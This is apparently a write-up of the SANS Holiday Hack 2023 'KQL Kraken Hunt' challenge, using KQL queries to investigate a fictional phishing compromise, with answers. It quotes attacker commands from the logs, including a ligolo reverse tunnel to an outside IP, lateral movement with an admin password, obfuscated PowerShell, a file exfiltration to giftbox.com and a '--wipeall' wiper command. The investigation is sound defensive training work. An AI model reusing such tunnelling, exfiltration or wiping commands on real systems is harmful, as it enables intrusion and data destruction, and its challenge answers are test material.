---
icon: material/text-box-outline
---

# KQL Kraken Hunt

**Difficulty**: :material-pine-tree-variant::material-pine-tree-variant::material-pine-tree-variant-outline::material-pine-tree-variant-outline::material-pine-tree-variant-outline:<br/>
**Direct link**: [Kusto](https://detective.kusto.io/sans2023)

## Objective

!!! question "Request"
    Use Azure Data Explorer to [uncover misdeeds](https://detective.kusto.io/sans2023) in Santa's IT enterprise. Go to Film Noir Island and talk to Tangle Coalbox for more information.

??? quote "Tangle Coalbox"
    Greetings, rookie. Tangle Coalbox of Kusto Detective Agency here.<br/>
    I've got a network infection case on Film Noir Island that needs your expertise.<br/>
    Seems like someone clicked a phishing link within a client's organization, and trouble's brewing<br/>
    I'm swamped with cases, so I need an extra pair of hands. You up for the challenge?<br/>
    You'll be utilizing the Azure Data Explorer and those KQL skills of yours to investigate this   incident.<br/>
    Before you start, you'll need to [create a free cluster](https://dataexplorer.azure.com/freecluster).<br/>
    Keep your eyes peeled for suspicious activity, IP addresses, and patterns that'll help us crack this case wide open.<br/>
    Remember, kid, time is of the essence. The sooner we can resolve this issue, the better.<br/>
    If you run into any problems, just give me a holler, I've got your back.<br/>
    Good hunting, and let's bring this cyber criminal to justice.<br/>
    Once you've got the intel we need, report back and we'll plan our next move. Stay sharp, rookie.<br/>

## Hints

??? tip "File Creation"
    Looking for a file that was created on a victim system? Don't forget the FileCreationEvents table

??? tip "Insert Hint 2 Title"
    Once you get into the [Kusto trainer](https://detective.kusto.io/sans2023), click the blue Train me for the case button to get familiar with KQL.

## Solution

### Setting up
Set up a free cluster here: https://dataexplorer.azure.com/freecluster and then link it into the
Kusto site: https://detective.kusto.io/sans2023 as described.

!!! warning "Season 1 / Season 2"
    I was a little confused by the tutorial and imported the "Season 1" and "Season 2" tables. You don't want those and should delete them if you have already imported them.

In the `Welcome to SANS Holiday Hack 2023!`, there's an `execute database script`. Click the run button to get access to the elves' data.

### Welcome to Operation Giftwrap: Defending the Geese Island network

??? "Background"
    An urgent alert has just come in, 'A user clicked through to a potentially malicious URL involving one user.' This message hints at a possible security incident, leaving us with critical questions about the user's intentions, the nature of the threat, and the potential risks to Santa's operations. Your mission is to lead our security operations team, investigate the incident, uncover the motives behind email, assess the potential threats, and safeguard the operations from the looming cyber threat.<br/><br/>
    The clock is ticking, and the stakes are high - are you up for this exhilarating challenge? Your skills will be put to the test, and the future of Geese Island's digital security hangs in the balance. Good luck!<br/><br/>
    The alert says the user clicked the malicious link 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

We can find the relevant logs by running:
```
Email
| where link == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
```

Q. What is the email address of the employee who received this phishing email?

A. alabaster_snowball@santaworkshopgeeseislands.org

Q. What is the email address that was used to send this spear phishing email?

A. cwombley@gmail.com

Q. What was the subject line used in the spear phishing email?

A. [EXTERNAL] Invoice foir reindeer food past due

### Someone got phished! Let's dig deeper on the victim...

??? "Background"
    Nicely done! You found evidence of the spear phishing email targeting someone in our organization. Now, we need to learn more about who the victim is!<br/><br/>
    If the victim is someone important, our organization could be doomed! Hurry up, let's find out more about who was impacted!

We can find more about the impacted employee by using the email address we found in the last section:
```
Employees
| where email_addr == 'alabaster_snowball@santaworkshopgeeseislands.org'
```

Q. What is the role of our victim in the organization?

A. Head Elf

Q. What is the hostname of the victim's machine?

A. Y1US-DESKTOP

Q. What is the source IP linked to the victim?

A. 10.10.0.4

### That's not good. What happened next?

??? "Background"
    The victim is Alabaster Snowball? Oh no... that's not good at all! Can you try to find what else the attackers might have done after they sent Alabaster the phishing email?<br/><br/>
    Use our various security log datasources to uncover more details about what happened to Alabaster.

Q. What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!

We should be able to find this by looking at the outbound connections to the URL we were given initially:

```
OutboundNetworkEvents
| where url == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
```

A. 2023-12-02T10:12:42Z

Q. What file is dropped to Alabaster's machine shortly after he downloads the malicious file?

A file must've been created and we already know the hostname of Alabaster's machine and the earliest date it could have been created (from above). So we just need to filter by that, and
order by the earliest:

```
FileCreationEvents
| where hostname == 'Y1US-DESKTOP'
| where timestamp >= make_datetime(2023, 12, 02, 10, 12, 42)
| order by timestamp asc
| take 2
```

The first result is the malicious .docx file, the second is the executable we care about:

A. giftwrap.exe

### A compromised host! Time for a deep dive.

??? "Background"
    Well, that's not good. It looks like Alabaster clicked on the link and downloaded a suspicious file. I don't know exactly what giftwrap.exe does, but it seems bad.<br/><br/>
    Can you take a closer look at endpoint data from Alabaster's machine? We need to figure out exactly what happened here. Word of this hack is starting to spread to the other elves, so work quickly and quietly!

Q. The attacker created an reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?

We know the hostname and the rough timestamp, so let's see if we can find anything suspicious:
```
ProcessEvents
| where hostname == 'Y1US-DESKTOP'
| where timestamp >= make_datetime(2023, 12, 02, 10, 12, 42)
| order by timestamp asc
```
Sure enough, this event is recorded shortly after the compromise: `"ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof`

A. 113.37.9.17

Q. What is the timestamp when the attackers enumerated network shares on the machine?

If we scroll down a bit from the logs above, we find:
```
2023-12-02T16:44:10Z net view /DOMAIN
2023-12-02T16:51:44Z net share
```
You'd think it'd be `net view`, but no, `net share` is used to enumerate the shares.

A. 2023-12-02T16:51:44Z

Q. What was the hostname of the system the attacker moved laterally to?

If we keep scrolling through those logs to see if anything interesting happens, we eventually get to this log:

`bfc3e1967ffe2b1e6752165a94f7f84a216300711034b2c64b1e440a54e91793 cmd.exe /C net use \\NorthPolefileshare\c$ /user:admin AdminPass123`

A. NorthPolefileshare

### A hidden message

??? "Background"
    Wow, you're unstoppable! Great work finding the malicious activity on Alabaster's machine. I've been looking a bit myself and... I'm stuck. The messages seem to be garbled. Do you think you can try to decode them and find out what's happening?<br/>
    Look around for encoded commands. Use your skills to decode them and find the true meaning of the attacker's intent! Some of these might be extra tricky and require extra steps to fully decode! Good luck!<br/>
    If you need some extra help with base64 encoding and decoding, click on the 'Train me for this case' button at the top-right of your screen.

Q. When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?

We can look for encoded messages since they should include PowerShell's `-enc` option:
```
ProcessEvents
| where hostname == 'Y1US-DESKTOP'
| where process_commandline contains '-enc'
| where timestamp >= make_datetime(2023, 12, 02, 10, 12, 42)
| order by timestamp asc
```

The first is just an update and likely not attacker-initiated

A. 2023-12-24T16:07:47Z

Q. What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)?

The command run was: `C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn`

```bash
$ echo "KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn" | base64 -d
( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''% 
```
Simple in-brain reversing gets us:

A. NaughtyNiceList.txt             `

Q. The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?

The next command is: `C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4=`

which decodes to:
`[StRiNg]::JoIn( '', [ChaR[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))|& ((gv '*MDr*').NamE[3,11,2]-joiN`

I figured this was a good use of ChatGPT, since I'm meant to be using it for the writeup, and it... gave me the answer but not in a page-limit-friendly-way, so let's just show the Python option:

```python
>>> for x in [100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101]:
    print(chr(x), end="")
... 
downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file
```

A. giftbox.com

### The final step!

??? "Background"
    Wow! You decoded those secret messages with easy! You're a rockstar. It seems like we're getting near the end of this investigation, but we need your help with one more thing...<br/>
    We know that the attackers stole Santa's naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?

The last command was `C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ=`
Which decodes to `C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c`

Q. What is the name of the executable the attackers used in the final malicious command?
A. downwithsanta.exe

Q. What was the command line flag used alongside this executable?
A. --wipeall

### Congratulations

??? "Background"
    Congratulations, you've cracked the Kusto detective agency section of the Holiday Hack Challenge!<br/>
    By now, you've likely pieced together the broader narrative of the alert we received. It all started with Wombley Cube, a skilled Craftsperson, and a malicious insider, who sent an email to the esteemed head elf, Alabaster Snowball. This seemingly innocent email contained a dangerous link leading to the malicious domain, MadElvesNorthPole.org. Alabaster Snowball, from his PC, unwittingly clicked on the link, resulting in the download and execution of malicious payloads. Notably, you've also discerned Wombley Cube's ulterior motive: to pilfer a copy of Santa's naughty or nice list and erase the data on the share drive containing critical information to Santa's operations. Kudos to you!<br/>
    To earn credit for your fantastic work, return to the Holiday Hack Challenge and enter the secret phrase which is the result of running this query:<br/>
    `print base64_decode_tostring('QmV3YXJlIHRoZSBDdWJlIHRoYXQgV29tYmxlcw==')`

!!! success "Answer"
    Beware the Cube that Wombles


## Response

!!! quote "Tangle Coalbox"
    I had my doubts, but you've proven your worth.<br/>
    That phishing scheme won't trouble our client's organization anymore, thanks to your keen eye and investigatory prowess.<br/>
    So long, Gumshoe, and be careful out there.<br/>
